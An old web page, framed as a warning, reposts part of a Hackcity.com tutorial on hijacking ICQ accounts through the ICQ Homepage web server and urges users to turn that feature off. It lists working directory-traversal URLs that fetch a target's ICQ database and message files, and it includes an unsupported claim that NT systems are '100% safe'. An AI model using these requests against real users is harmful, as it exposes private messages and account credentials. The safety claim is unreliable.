Our Big Problem "ICQ Account Cracking" and Protection

The document below was taken from Hackcity.com and it shows that our accounts are not secure enough. As it explains, you can pose as someone by stealing his/her icq number access. It says it doesn't work out all the time. But there is still danger. So we hope somebody fix this problem in the new version of the ICQ. As we discussed the problem with some programmers with a brainstorming session, we came to conclusion that activating the ICQ Homepage by pressing "Services Button" and "My ICQ Page" and choosing "Activate Homepage" may cause reaching any other person to your files. ICQ is already saying that it is not secure and doesn't suggest you activate it as stated below :

"Caution! By activating the "My Homepage" feature, you may provide third parties with certain limited remote access to certain files on your computer. Activating this feature increases the risk that parties will be able to tamper with your computer. Also please note that by activating the "My Homepage" feature you allow third parties to view your IP address. "
Click here to see more

Please do not try to do the cracking told below to even test it. It is illegal and it was published just for warning the company.

ICQ Account Cracking
By Shadow51

A lot of people have been asking me how it would be possible to crack ICQ accounts. It's very easy, but unfortunately it doesn't work every time. All you do is put in this:
1. Download the following files from the targeted users hard drive using the ICQ exploit:
(replace 123.123.123.123 by the guys IP and UIN by the guys ICQ #)
(note that there's 6 dots not 8)

http://123.123.123.123/.html/....../db/UIN.idx
http://123.123.123.123/.html/....../db/UIN.dat
http://123.123.123.123/.html/....../db/UINmsg.dat
http://123.123.123.123/.html/....../db/UINmsg.idx
http://123.123.123.123/.html/....../db/UINhis.idx
http://123.123.123.123/.html/....../db/UINhis.dat

2. Open Notepad and create a new document.

THIS PART OF THE DOCUMENT IS CUT FOR PREVENTING PEOPLE TRYING THIS HACKING METHOD. THE PART SHOWN ABOVE AND BELOW IS ENOUGH TO UNDERSTAND THE BUG AND MAKE PATCH FOR IT FOR THE ICQ COMPANY. DETAILED INFORMATION CAN BE TAKEN FROM HACKCITY.COM FOR ONLY EDUCATIONAL PURPOSES.

THE ONLY PROTECTION AGAINST THIS BUG IS TO DE-ACTIVATE ICQ HOMEPAGE AS SOON AS POSSIBLE

 

I saw in the original ICQ Exploit text that the HTTP server Exploit doesn't work on NT, so i went in NT and i tested it. The result was system wasn't exploitable. Hence, if you are running NT, and you want to use the HTTP server; it's 100% safe for you to do so.

Shadow51
29000000
Shadow51@hackcity.com
Document taken from www.hackcity.com

See also the related topic "Protection of ICQ Homepage Exploit"